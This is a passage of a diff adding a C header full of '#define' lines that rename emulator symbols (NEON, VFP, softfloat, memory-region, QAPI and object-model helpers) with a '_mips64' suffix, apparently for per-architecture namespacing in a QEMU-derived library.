helper_neon_widen_s16 helper_neon_widen_s16_mips64 +#define helper_neon_widen_s8 helper_neon_widen_s8_mips64 +#define helper_neon_widen_u16 helper_neon_widen_u16_mips64 +#define helper_neon_widen_u8 helper_neon_widen_u8_mips64 +#define helper_neon_zip16 helper_neon_zip16_mips64 +#define 
helper_neon_zip8 helper_neon_zip8_mips64 +#define helper_pre_hvc helper_pre_hvc_mips64 +#define helper_pre_smc helper_pre_smc_mips64 +#define helper_qadd16 helper_qadd16_mips64 +#define helper_qadd8 helper_qadd8_mips64 +#define helper_qaddsubx helper_qaddsubx_mips64 +#define helper_qsub16 helper_qsub16_mips64 +#define helper_qsub8 helper_qsub8_mips64 +#define helper_qsubaddx helper_qsubaddx_mips64 +#define helper_rbit helper_rbit_mips64 +#define helper_recpe_f32 helper_recpe_f32_mips64 +#define helper_recpe_f64 helper_recpe_f64_mips64 +#define helper_recpe_u32 helper_recpe_u32_mips64 +#define helper_recps_f32 helper_recps_f32_mips64 +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips64 +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64 +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64 +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips64 +#define helper_rintd helper_rintd_mips64 +#define helper_rintd_exact helper_rintd_exact_mips64 +#define helper_rints helper_rints_mips64 +#define helper_rints_exact helper_rints_exact_mips64 +#define helper_ror_cc helper_ror_cc_mips64 +#define helper_rsqrte_f32 helper_rsqrte_f32_mips64 +#define helper_rsqrte_f64 helper_rsqrte_f64_mips64 +#define helper_rsqrte_u32 helper_rsqrte_u32_mips64 +#define helper_rsqrts_f32 helper_rsqrts_f32_mips64 +#define helper_sadd16 helper_sadd16_mips64 +#define helper_sadd8 helper_sadd8_mips64 +#define helper_saddsubx helper_saddsubx_mips64 +#define helper_sar_cc helper_sar_cc_mips64 +#define helper_sdiv helper_sdiv_mips64 +#define helper_sel_flags helper_sel_flags_mips64 +#define helper_set_cp_reg helper_set_cp_reg_mips64 +#define helper_set_cp_reg64 helper_set_cp_reg64_mips64 +#define helper_set_neon_rmode helper_set_neon_rmode_mips64 +#define helper_set_r13_banked helper_set_r13_banked_mips64 +#define helper_set_rmode helper_set_rmode_mips64 +#define helper_set_user_reg helper_set_user_reg_mips64 +#define helper_shadd16 helper_shadd16_mips64 +#define helper_shadd8 helper_shadd8_mips64 
+#define helper_shaddsubx helper_shaddsubx_mips64 +#define helper_shl_cc helper_shl_cc_mips64 +#define helper_shr_cc helper_shr_cc_mips64 +#define helper_shsub16 helper_shsub16_mips64 +#define helper_shsub8 helper_shsub8_mips64 +#define helper_shsubaddx helper_shsubaddx_mips64 +#define helper_ssat helper_ssat_mips64 +#define helper_ssat16 helper_ssat16_mips64 +#define helper_ssub16 helper_ssub16_mips64 +#define helper_ssub8 helper_ssub8_mips64 +#define helper_ssubaddx helper_ssubaddx_mips64 +#define helper_stb_mmu helper_stb_mmu_mips64 +#define helper_stl_mmu helper_stl_mmu_mips64 +#define helper_stq_mmu helper_stq_mmu_mips64 +#define helper_stw_mmu helper_stw_mmu_mips64 +#define helper_sub_saturate helper_sub_saturate_mips64 +#define helper_sub_usaturate helper_sub_usaturate_mips64 +#define helper_sxtb16 helper_sxtb16_mips64 +#define helper_uadd16 helper_uadd16_mips64 +#define helper_uadd8 helper_uadd8_mips64 +#define helper_uaddsubx helper_uaddsubx_mips64 +#define helper_udiv helper_udiv_mips64 +#define helper_uhadd16 helper_uhadd16_mips64 +#define helper_uhadd8 helper_uhadd8_mips64 +#define helper_uhaddsubx helper_uhaddsubx_mips64 +#define helper_uhsub16 helper_uhsub16_mips64 +#define helper_uhsub8 helper_uhsub8_mips64 +#define helper_uhsubaddx helper_uhsubaddx_mips64 +#define helper_uqadd16 helper_uqadd16_mips64 +#define helper_uqadd8 helper_uqadd8_mips64 +#define helper_uqaddsubx helper_uqaddsubx_mips64 +#define helper_uqsub16 helper_uqsub16_mips64 +#define helper_uqsub8 helper_uqsub8_mips64 +#define helper_uqsubaddx helper_uqsubaddx_mips64 +#define helper_usad8 helper_usad8_mips64 +#define helper_usat helper_usat_mips64 +#define helper_usat16 helper_usat16_mips64 +#define helper_usub16 helper_usub16_mips64 +#define helper_usub8 helper_usub8_mips64 +#define helper_usubaddx helper_usubaddx_mips64 +#define helper_uxtb16 helper_uxtb16_mips64 +#define helper_v7m_mrs helper_v7m_mrs_mips64 +#define helper_v7m_msr helper_v7m_msr_mips64 +#define helper_vfp_absd 
helper_vfp_absd_mips64 +#define helper_vfp_abss helper_vfp_abss_mips64 +#define helper_vfp_addd helper_vfp_addd_mips64 +#define helper_vfp_adds helper_vfp_adds_mips64 +#define helper_vfp_cmpd helper_vfp_cmpd_mips64 +#define helper_vfp_cmped helper_vfp_cmped_mips64 +#define helper_vfp_cmpes helper_vfp_cmpes_mips64 +#define helper_vfp_cmps helper_vfp_cmps_mips64 +#define helper_vfp_divd helper_vfp_divd_mips64 +#define helper_vfp_divs helper_vfp_divs_mips64 +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips64 +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips64 +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips64 +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips64 +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mips64 +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips64 +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips64 +#define helper_vfp_maxd helper_vfp_maxd_mips64 +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips64 +#define helper_vfp_maxnums helper_vfp_maxnums_mips64 +#define helper_vfp_maxs helper_vfp_maxs_mips64 +#define helper_vfp_mind helper_vfp_mind_mips64 +#define helper_vfp_minnumd helper_vfp_minnumd_mips64 +#define helper_vfp_minnums helper_vfp_minnums_mips64 +#define helper_vfp_mins helper_vfp_mins_mips64 +#define helper_vfp_muladdd helper_vfp_muladdd_mips64 +#define helper_vfp_muladds helper_vfp_muladds_mips64 +#define helper_vfp_muld helper_vfp_muld_mips64 +#define helper_vfp_muls helper_vfp_muls_mips64 +#define helper_vfp_negd helper_vfp_negd_mips64 +#define helper_vfp_negs helper_vfp_negs_mips64 +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips64 +#define helper_vfp_shtod helper_vfp_shtod_mips64 +#define helper_vfp_shtos helper_vfp_shtos_mips64 +#define helper_vfp_sitod helper_vfp_sitod_mips64 +#define helper_vfp_sitos helper_vfp_sitos_mips64 +#define helper_vfp_sltod helper_vfp_sltod_mips64 +#define helper_vfp_sltos helper_vfp_sltos_mips64 +#define helper_vfp_sqrtd 
helper_vfp_sqrtd_mips64 +#define helper_vfp_sqrts helper_vfp_sqrts_mips64 +#define helper_vfp_sqtod helper_vfp_sqtod_mips64 +#define helper_vfp_sqtos helper_vfp_sqtos_mips64 +#define helper_vfp_subd helper_vfp_subd_mips64 +#define helper_vfp_subs helper_vfp_subs_mips64 +#define helper_vfp_toshd helper_vfp_toshd_mips64 +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips64 +#define helper_vfp_toshs helper_vfp_toshs_mips64 +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips64 +#define helper_vfp_tosid helper_vfp_tosid_mips64 +#define helper_vfp_tosis helper_vfp_tosis_mips64 +#define helper_vfp_tosizd helper_vfp_tosizd_mips64 +#define helper_vfp_tosizs helper_vfp_tosizs_mips64 +#define helper_vfp_tosld helper_vfp_tosld_mips64 +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips64 +#define helper_vfp_tosls helper_vfp_tosls_mips64 +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips64 +#define helper_vfp_tosqd helper_vfp_tosqd_mips64 +#define helper_vfp_tosqs helper_vfp_tosqs_mips64 +#define helper_vfp_touhd helper_vfp_touhd_mips64 +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips64 +#define helper_vfp_touhs helper_vfp_touhs_mips64 +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips64 +#define helper_vfp_touid helper_vfp_touid_mips64 +#define helper_vfp_touis helper_vfp_touis_mips64 +#define helper_vfp_touizd helper_vfp_touizd_mips64 +#define helper_vfp_touizs helper_vfp_touizs_mips64 +#define helper_vfp_tould helper_vfp_tould_mips64 +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips64 +#define helper_vfp_touls helper_vfp_touls_mips64 +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips64 +#define helper_vfp_touqd helper_vfp_touqd_mips64 +#define helper_vfp_touqs helper_vfp_touqs_mips64 +#define helper_vfp_uhtod helper_vfp_uhtod_mips64 +#define helper_vfp_uhtos 
helper_vfp_uhtos_mips64 +#define helper_vfp_uitod helper_vfp_uitod_mips64 +#define helper_vfp_uitos helper_vfp_uitos_mips64 +#define helper_vfp_ultod helper_vfp_ultod_mips64 +#define helper_vfp_ultos helper_vfp_ultos_mips64 +#define helper_vfp_uqtod helper_vfp_uqtod_mips64 +#define helper_vfp_uqtos helper_vfp_uqtos_mips64 +#define helper_wfe helper_wfe_mips64 +#define helper_wfi helper_wfi_mips64 +#define hex2decimal hex2decimal_mips64 +#define hw_breakpoint_update hw_breakpoint_update_mips64 +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips64 +#define hw_watchpoint_update hw_watchpoint_update_mips64 +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips64 +#define _init _init_mips64 +#define init_cpreg_list init_cpreg_list_mips64 +#define init_lists init_lists_mips64 +#define input_type_enum input_type_enum_mips64 +#define int128_2_64 int128_2_64_mips64 +#define int128_add int128_add_mips64 +#define int128_addto int128_addto_mips64 +#define int128_and int128_and_mips64 +#define int128_eq int128_eq_mips64 +#define int128_ge int128_ge_mips64 +#define int128_get64 int128_get64_mips64 +#define int128_gt int128_gt_mips64 +#define int128_le int128_le_mips64 +#define int128_lt int128_lt_mips64 +#define int128_make64 int128_make64_mips64 +#define int128_max int128_max_mips64 +#define int128_min int128_min_mips64 +#define int128_ne int128_ne_mips64 +#define int128_neg int128_neg_mips64 +#define int128_nz int128_nz_mips64 +#define int128_rshift int128_rshift_mips64 +#define int128_sub int128_sub_mips64 +#define int128_subfrom int128_subfrom_mips64 +#define int128_zero int128_zero_mips64 +#define int16_to_float32 int16_to_float32_mips64 +#define int16_to_float64 int16_to_float64_mips64 +#define int32_to_float128 int32_to_float128_mips64 +#define int32_to_float32 int32_to_float32_mips64 +#define int32_to_float64 int32_to_float64_mips64 +#define int32_to_floatx80 int32_to_floatx80_mips64 +#define int64_to_float128 int64_to_float128_mips64 +#define 
int64_to_float32 int64_to_float32_mips64 +#define int64_to_float64 int64_to_float64_mips64 +#define int64_to_floatx80 int64_to_floatx80_mips64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips64 +#define invalidate_page_bitmap invalidate_page_bitmap_mips64 +#define io_mem_read io_mem_read_mips64 +#define io_mem_write io_mem_write_mips64 +#define io_readb io_readb_mips64 +#define io_readl io_readl_mips64 +#define io_readq io_readq_mips64 +#define io_readw io_readw_mips64 +#define iotlb_to_region iotlb_to_region_mips64 +#define io_writeb io_writeb_mips64 +#define io_writel io_writel_mips64 +#define io_writeq io_writeq_mips64 +#define io_writew io_writew_mips64 +#define is_a64 is_a64_mips64 +#define is_help_option is_help_option_mips64 +#define isr_read isr_read_mips64 +#define is_valid_option_list is_valid_option_list_mips64 +#define iwmmxt_load_creg iwmmxt_load_creg_mips64 +#define iwmmxt_load_reg iwmmxt_load_reg_mips64 +#define iwmmxt_store_creg iwmmxt_store_creg_mips64 +#define iwmmxt_store_reg iwmmxt_store_reg_mips64 +#define __jit_debug_descriptor __jit_debug_descriptor_mips64 +#define __jit_debug_register_code __jit_debug_register_code_mips64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips64 +#define last_ram_offset last_ram_offset_mips64 +#define ldl_be_p ldl_be_p_mips64 +#define ldl_be_phys ldl_be_phys_mips64 +#define ldl_he_p ldl_he_p_mips64 +#define ldl_le_p ldl_le_p_mips64 +#define ldl_le_phys ldl_le_phys_mips64 +#define ldl_phys ldl_phys_mips64 +#define ldl_phys_internal ldl_phys_internal_mips64 +#define ldq_be_p ldq_be_p_mips64 +#define ldq_be_phys ldq_be_phys_mips64 +#define ldq_he_p ldq_he_p_mips64 +#define ldq_le_p ldq_le_p_mips64 +#define ldq_le_phys ldq_le_phys_mips64 +#define ldq_phys ldq_phys_mips64 +#define ldq_phys_internal ldq_phys_internal_mips64 +#define ldst_name ldst_name_mips64 +#define ldub_p ldub_p_mips64 +#define ldub_phys ldub_phys_mips64 +#define lduw_be_p lduw_be_p_mips64 +#define lduw_be_phys lduw_be_phys_mips64 +#define 
lduw_he_p lduw_he_p_mips64 +#define lduw_le_p lduw_le_p_mips64 +#define lduw_le_phys lduw_le_phys_mips64 +#define lduw_phys lduw_phys_mips64 +#define lduw_phys_internal lduw_phys_internal_mips64 +#define le128 le128_mips64 +#define linked_bp_matches linked_bp_matches_mips64 +#define listener_add_address_space listener_add_address_space_mips64 +#define load_cpu_offset load_cpu_offset_mips64 +#define load_reg load_reg_mips64 +#define load_reg_var load_reg_var_mips64 +#define log_cpu_state log_cpu_state_mips64 +#define lpae_cp_reginfo lpae_cp_reginfo_mips64 +#define lt128 lt128_mips64 +#define machine_class_init machine_class_init_mips64 +#define machine_finalize machine_finalize_mips64 +#define machine_info machine_info_mips64 +#define machine_initfn machine_initfn_mips64 +#define machine_register_types machine_register_types_mips64 +#define machvirt_init machvirt_init_mips64 +#define machvirt_machine_init machvirt_machine_init_mips64 +#define maj maj_mips64 +#define mapping_conflict mapping_conflict_mips64 +#define mapping_contiguous mapping_contiguous_mips64 +#define mapping_have_same_region mapping_have_same_region_mips64 +#define mapping_merge mapping_merge_mips64 +#define mem_add mem_add_mips64 +#define mem_begin mem_begin_mips64 +#define mem_commit mem_commit_mips64 +#define memory_access_is_direct memory_access_is_direct_mips64 +#define memory_access_size memory_access_size_mips64 +#define memory_init memory_init_mips64 +#define memory_listener_match memory_listener_match_mips64 +#define memory_listener_register memory_listener_register_mips64 +#define memory_listener_unregister memory_listener_unregister_mips64 +#define memory_map_init memory_map_init_mips64 +#define memory_mapping_filter memory_mapping_filter_mips64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64 +#define memory_mapping_list_free 
memory_mapping_list_free_mips64 +#define memory_mapping_list_init memory_mapping_list_init_mips64 +#define memory_region_access_valid memory_region_access_valid_mips64 +#define memory_region_add_subregion memory_region_add_subregion_mips64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64 +#define memory_region_big_endian memory_region_big_endian_mips64 +#define memory_region_clear_pending memory_region_clear_pending_mips64 +#define memory_region_del_subregion memory_region_del_subregion_mips64 +#define memory_region_destructor_alias memory_region_destructor_alias_mips64 +#define memory_region_destructor_none memory_region_destructor_none_mips64 +#define memory_region_destructor_ram memory_region_destructor_ram_mips64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips64 +#define memory_region_dispatch_read memory_region_dispatch_read_mips64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips64 +#define memory_region_dispatch_write memory_region_dispatch_write_mips64 +#define memory_region_escape_name memory_region_escape_name_mips64 +#define memory_region_finalize memory_region_finalize_mips64 +#define memory_region_find memory_region_find_mips64 +#define memory_region_get_addr memory_region_get_addr_mips64 +#define memory_region_get_alignment memory_region_get_alignment_mips64 +#define memory_region_get_container memory_region_get_container_mips64 +#define memory_region_get_fd memory_region_get_fd_mips64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips64 +#define memory_region_get_priority memory_region_get_priority_mips64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64 +#define memory_region_get_size memory_region_get_size_mips64 +#define memory_region_info 
memory_region_info_mips64 +#define memory_region_init memory_region_init_mips64 +#define memory_region_init_alias memory_region_init_alias_mips64 +#define memory_region_initfn memory_region_initfn_mips64 +#define memory_region_init_io memory_region_init_io_mips64 +#define memory_region_init_ram memory_region_init_ram_mips64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64 +#define memory_region_init_reservation memory_region_init_reservation_mips64 +#define memory_region_is_iommu memory_region_is_iommu_mips64 +#define memory_region_is_logging memory_region_is_logging_mips64 +#define memory_region_is_mapped memory_region_is_mapped_mips64 +#define memory_region_is_ram memory_region_is_ram_mips64 +#define memory_region_is_rom memory_region_is_rom_mips64 +#define memory_region_is_romd memory_region_is_romd_mips64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips64 +#define memory_region_is_unassigned memory_region_is_unassigned_mips64 +#define memory_region_name memory_region_name_mips64 +#define memory_region_need_escape memory_region_need_escape_mips64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips64 +#define memory_region_present memory_region_present_mips64 +#define memory_region_read_accessor memory_region_read_accessor_mips64 +#define memory_region_readd_subregion memory_region_readd_subregion_mips64 +#define memory_region_ref memory_region_ref_mips64 +#define memory_region_resolve_container memory_region_resolve_container_mips64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mips64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64 +#define memory_region_set_address memory_region_set_address_mips64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips64 +#define memory_region_set_enabled 
memory_region_set_enabled_mips64 +#define memory_region_set_readonly memory_region_set_readonly_mips64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips64 +#define memory_region_size memory_region_size_mips64 +#define memory_region_to_address_space memory_region_to_address_space_mips64 +#define memory_region_transaction_begin memory_region_transaction_begin_mips64 +#define memory_region_transaction_commit memory_region_transaction_commit_mips64 +#define memory_region_unref memory_region_unref_mips64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips64 +#define memory_region_write_accessor memory_region_write_accessor_mips64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips64 +#define memory_try_enable_merging memory_try_enable_merging_mips64 +#define module_call_init module_call_init_mips64 +#define module_load module_load_mips64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips64 +#define mpidr_read mpidr_read_mips64 +#define msr_mask msr_mask_mips64 +#define mul128By64To192 mul128By64To192_mips64 +#define mul128To256 mul128To256_mips64 +#define mul64To128 mul64To128_mips64 +#define muldiv64 muldiv64_mips64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips64 +#define neon_2rm_sizes neon_2rm_sizes_mips64 +#define neon_3r_sizes neon_3r_sizes_mips64 +#define neon_get_scalar neon_get_scalar_mips64 +#define neon_load_reg neon_load_reg_mips64 +#define neon_load_reg64 neon_load_reg64_mips64 +#define neon_load_scratch neon_load_scratch_mips64 +#define neon_ls_element_type neon_ls_element_type_mips64 +#define neon_reg_offset neon_reg_offset_mips64 +#define neon_store_reg neon_store_reg_mips64 +#define neon_store_reg64 neon_store_reg64_mips64 +#define neon_store_scratch neon_store_scratch_mips64 +#define new_ldst_label new_ldst_label_mips64 +#define next_list next_list_mips64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips64 +#define normalizeFloat16Subnormal 
normalizeFloat16Subnormal_mips64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips64 +#define object_child_foreach object_child_foreach_mips64 +#define object_class_foreach object_class_foreach_mips64 +#define object_class_foreach_tramp object_class_foreach_tramp_mips64 +#define object_class_get_list object_class_get_list_mips64 +#define object_class_get_list_tramp object_class_get_list_tramp_mips64 +#define object_class_get_parent object_class_get_parent_mips64 +#define object_deinit object_deinit_mips64 +#define object_dynamic_cast object_dynamic_cast_mips64 +#define object_finalize object_finalize_mips64 +#define object_finalize_child_property object_finalize_child_property_mips64 +#define object_get_child_property object_get_child_property_mips64 +#define object_get_link_property object_get_link_property_mips64 +#define object_get_root object_get_root_mips64 +#define object_initialize_with_type object_initialize_with_type_mips64 +#define object_init_with_type object_init_with_type_mips64 +#define object_instance_init object_instance_init_mips64 +#define object_new_with_type object_new_with_type_mips64 +#define object_post_init_with_type object_post_init_with_type_mips64 +#define object_property_add_alias object_property_add_alias_mips64 +#define object_property_add_link object_property_add_link_mips64 +#define object_property_add_uint16_ptr 
object_property_add_uint16_ptr_mips64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips64 +#define object_property_allow_set_link object_property_allow_set_link_mips64 +#define object_property_del object_property_del_mips64 +#define object_property_del_all object_property_del_all_mips64 +#define object_property_find object_property_find_mips64 +#define object_property_get object_property_get_mips64 +#define object_property_get_bool object_property_get_bool_mips64 +#define object_property_get_int object_property_get_int_mips64 +#define object_property_get_link object_property_get_link_mips64 +#define object_property_get_qobject object_property_get_qobject_mips64 +#define object_property_get_str object_property_get_str_mips64 +#define object_property_get_type object_property_get_type_mips64 +#define object_property_is_child object_property_is_child_mips64 +#define object_property_set object_property_set_mips64 +#define object_property_set_description object_property_set_description_mips64 +#define object_property_set_link object_property_set_link_mips64 +#define object_property_set_qobject object_property_set_qobject_mips64 +#define object_release_link_property object_release_link_property_mips64 +#define object_resolve_abs_path object_resolve_abs_path_mips64 +#define object_resolve_child_property object_resolve_child_property_mips64 +#define object_resolve_link object_resolve_link_mips64 +#define object_resolve_link_property object_resolve_link_property_mips64 +#define object_resolve_partial_path object_resolve_partial_path_mips64 +#define object_resolve_path object_resolve_path_mips64 +#define object_resolve_path_component object_resolve_path_component_mips64 +#define object_resolve_path_type object_resolve_path_type_mips64 +#define object_set_link_property object_set_link_property_mips64 
+#define object_unparent object_unparent_mips64 +#define omap_cachemaint_write omap_cachemaint_write_mips64 +#define omap_cp_reginfo omap_cp_reginfo_mips64 +#define omap_threadid_write omap_threadid_write_mips64 +#define omap_ticonfig_write omap_ticonfig_write_mips64 +#define omap_wfi_write omap_wfi_write_mips64 +#define op_bits op_bits_mips64 +#define open_modeflags open_modeflags_mips64 +#define op_to_mov op_to_mov_mips64 +#define op_to_movi op_to_movi_mips64 +#define output_type_enum output_type_enum_mips64 +#define packFloat128 packFloat128_mips64 +#define packFloat16 packFloat16_mips64 +#define packFloat32 packFloat32_mips64 +#define packFloat64 packFloat64_mips64 +#define packFloatx80 packFloatx80_mips64 +#define page_find page_find_mips64 +#define page_find_alloc page_find_alloc_mips64 +#define page_flush_tb page_flush_tb_mips64 +#define page_flush_tb_1 page_flush_tb_1_mips64 +#define page_init page_init_mips64 +#define page_size_init page_size_init_mips64 +#define par par_mips64 +#define parse_array parse_array_mips64 +#define parse_error parse_error_mips64 +#define parse_escape parse_escape_mips64 +#define parse_keyword parse_keyword_mips64 +#define parse_literal parse_literal_mips64 +#define parse_object parse_object_mips64 +#define parse_optional parse_optional_mips64 +#define parse_option_bool parse_option_bool_mips64 +#define parse_option_number parse_option_number_mips64 +#define parse_option_size parse_option_size_mips64 +#define parse_pair parse_pair_mips64 +#define parser_context_free parser_context_free_mips64 +#define parser_context_new parser_context_new_mips64 +#define parser_context_peek_token parser_context_peek_token_mips64 +#define parser_context_pop_token parser_context_pop_token_mips64 +#define parser_context_restore parser_context_restore_mips64 +#define parser_context_save parser_context_save_mips64 +#define parse_str parse_str_mips64 +#define parse_type_bool parse_type_bool_mips64 +#define parse_type_int parse_type_int_mips64 +#define 
parse_type_number parse_type_number_mips64 +#define parse_type_size parse_type_size_mips64 +#define parse_type_str parse_type_str_mips64 +#define parse_value parse_value_mips64 +#define par_write par_write_mips64 +#define patch_reloc patch_reloc_mips64 +#define phys_map_node_alloc phys_map_node_alloc_mips64 +#define phys_map_node_reserve phys_map_node_reserve_mips64 +#define phys_mem_alloc phys_mem_alloc_mips64 +#define phys_mem_set_alloc phys_mem_set_alloc_mips64 +#define phys_page_compact phys_page_compact_mips64 +#define phys_page_compact_all phys_page_compact_all_mips64 +#define phys_page_find phys_page_find_mips64 +#define phys_page_set phys_page_set_mips64 +#define phys_page_set_level phys_page_set_level_mips64 +#define phys_section_add phys_section_add_mips64 +#define phys_section_destroy phys_section_destroy_mips64 +#define phys_sections_free phys_sections_free_mips64 +#define pickNaN pickNaN_mips64 +#define pickNaNMulAdd pickNaNMulAdd_mips64 +#define pmccfiltr_write pmccfiltr_write_mips64 +#define pmccntr_read pmccntr_read_mips64 +#define pmccntr_sync pmccntr_sync_mips64 +#define pmccntr_write pmccntr_write_mips64 +#define pmccntr_write32 pmccntr_write32_mips64 +#define pmcntenclr_write pmcntenclr_write_mips64 +#define pmcntenset_write pmcntenset_write_mips64 +#define pmcr_write pmcr_write_mips64 +#define pmintenclr_write pmintenclr_write_mips64 +#define pmintenset_write pmintenset_write_mips64 +#define pmovsr_write pmovsr_write_mips64 +#define pmreg_access pmreg_access_mips64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips64 +#define pmuserenr_write pmuserenr_write_mips64 +#define pmxevtyper_write pmxevtyper_write_mips64 +#define print_type_bool print_type_bool_mips64 +#define print_type_int print_type_int_mips64 +#define 
print_type_number print_type_number_mips64 +#define print_type_size print_type_size_mips64 +#define print_type_str print_type_str_mips64 +#define propagateFloat128NaN propagateFloat128NaN_mips64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips64 +#define propagateFloat32NaN propagateFloat32NaN_mips64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mips64 +#define propagateFloat64NaN propagateFloat64NaN_mips64 +#define propagateFloatx80NaN propagateFloatx80NaN_mips64 +#define property_get_alias property_get_alias_mips64 +#define property_get_bool property_get_bool_mips64 +#define property_get_str property_get_str_mips64 +#define property_get_uint16_ptr property_get_uint16_ptr_mips64 +#define property_get_uint32_ptr property_get_uint32_ptr_mips64 +#define property_get_uint64_ptr property_get_uint64_ptr_mips64 +#define property_get_uint8_ptr property_get_uint8_ptr_mips64 +#define property_release_alias property_release_alias_mips64 +#define property_release_bool property_release_bool_mips64 +#define property_release_str property_release_str_mips64 +#define property_resolve_alias property_resolve_alias_mips64 +#define property_set_alias property_set_alias_mips64 +#define property_set_bool property_set_bool_mips64 +#define property_set_str property_set_str_mips64 +#define pstate_read pstate_read_mips64 +#define pstate_write pstate_write_mips64 +#define pxa250_initfn pxa250_initfn_mips64 +#define pxa255_initfn pxa255_initfn_mips64 +#define pxa260_initfn pxa260_initfn_mips64 +#define pxa261_initfn pxa261_initfn_mips64 +#define pxa262_initfn pxa262_initfn_mips64 +#define pxa270a0_initfn pxa270a0_initfn_mips64 +#define pxa270a1_initfn pxa270a1_initfn_mips64 +#define pxa270b0_initfn pxa270b0_initfn_mips64 +#define pxa270b1_initfn pxa270b1_initfn_mips64 +#define pxa270c0_initfn pxa270c0_initfn_mips64 +#define pxa270c5_initfn pxa270c5_initfn_mips64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips64 +#define 
qapi_dealloc_end_list qapi_dealloc_end_list_mips64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips64 +#define qapi_dealloc_pop qapi_dealloc_pop_mips64 +#define qapi_dealloc_push qapi_dealloc_push_mips64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_mips64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips64 +#define qapi_free_boolList qapi_free_boolList_mips64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mips64 +#define qapi_free_int16List 